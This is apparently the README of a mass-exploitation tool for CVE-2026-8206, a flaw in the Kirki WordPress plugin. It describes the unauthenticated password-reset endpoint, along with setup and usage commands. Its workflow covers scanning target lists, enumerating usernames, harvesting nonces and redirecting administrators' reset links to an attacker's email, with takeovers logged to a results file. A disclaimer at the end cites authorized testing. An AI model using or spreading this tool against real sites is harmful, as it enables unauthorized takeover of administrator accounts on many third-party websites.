## https://sploitus.com/exploit?id=24F04D01-BD33-5E2E-AD1D-CA3966227567
# CVE-2026-8206 - Kirki WordPress Plugin Mass Exploit
[](https://www.python.org/downloads/release/python-2718/)
[](LICENSE)
**Mass exploitation tool for CVE-2026-8206** – a critical vulnerability in the Kirki WordPress plugin (versions ≤ 6.0.6) that allows unauthenticated attackers to hijack password reset links and take over any user account, including administrators.
## Vulnerability Overview
The Kirki plugin exposes an unauthenticated REST endpoint (`/wp-json/KirkiComponentLibrary/v1/kirki-forgot-password`). Due to missing permission checks and improper email validation, an attacker can:
- Request a password reset for any valid username
- Supply an arbitrary email address (e.g., their own) to receive the reset link
- Gain full control over the target account
**Affected versions:** ≤ 6.0.6
**Fixed version:** 6.0.7
## Features
- **Multi‑threaded** – scan hundreds of targets quickly
- **Automatic plugin detection** – checks `readme.txt` and `kirki.min.css` (supports both `kirki` and `kirki-test` folders)
- **Smart nonce extraction** – finds nonces from 12+ common paths (root, login, lostpassword, etc.) using 10+ regex patterns
- **Username enumeration** – fetches real usernames from `/wp-json/wp/v2/users` (fallback to `admin`)
## Requirements
- Python 2.7
- `requests` library
- `concurrent.futures` (backport, usually installed)
Install dependencies:
```bash
pip install requests futures
```
## Installation
```bash
git clone https://github.com/Jenderal92/CVE-2026-8206.git
cd CVE-2026-8206
```
Edit the script to set your attacker email:
```python
ATTACKER_EMAIL = "youremail@example.com" # line ~15
```
## Usage
```bash
python CVE-2026-8206.py [threads]
```
- `` – text file with one domain per line (with or without `http://`/`https://`)
- `[threads]` – optional, number of concurrent threads (default: 15)
### Example
```bash
python CVE-2026-8206.py targets.txt 20
```
### Input file example (`targets.txt`)
```
example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
```
## Output
- `res.txt` – contains successfully exploited targets in format:
```
URL|username|attacker_email|reset_link_sent_to_attacker_email
```
Example:
```
https://example.com|admin|attacker@example.com|reset_link_sent_to_attacker_email
```
- Console output shows real‑time progress:
- Detected Kirki version
- Username used
- Nonces found (grouped by source URL)
- Testing status (VALID / FAILED) for each nonce
## How It Works
1. **Plugin detection** – requests `/wp-content/plugins/{kirki,kirki-test}/readme.txt` (Stable tag) and `/.../kirki.min.css` (ver parameter). If version ≤ 6.0.6, proceed.
2. **Username extraction** – tries `/wp-json/wp/v2/users`, if empty falls back to `admin`.
3. **Nonce harvesting** – visits 12+ URLs (root, login, forgot‑password pages, etc.) and extracts any nonce-like strings (8+ hex chars) using multiple regex patterns.
4. **Exploit attempt** – for each nonce, sends a POST request to the vulnerable endpoint with:
- `username` = target username
- `email` = attacker’s email
- `emailBody` = JSON that includes the `reset_link` chip
5. **Success** – if the server responds with `200` and `"Email sent"`, the target is written to `res.txt`.
## Important Notes
- The reset link is **sent to the attacker’s email**; you must have access to that inbox.
- Only **valid (exploitable) targets** are saved – no false positives.
- Use responsibly and only on systems you own or have explicit permission to test.
## Disclaimer
This software is provided for **educational and authorized security testing purposes only**. Unauthorized use against systems you do not own or have permission to test is illegal. The author is not responsible for any misuse or damage caused by this tool.
More Disclaimer You Can see the disclaimer on the cover of Jenderal92. You can check it [HERE !!!](https://github.com/Jenderal92/)
## References
- [CVE-2026-8206](https://nvd.nist.gov/vuln/detail/CVE-2026-8206) (when published)
- [Kirki plugin changelog](https://wordpress.org/plugins/kirki/#developers)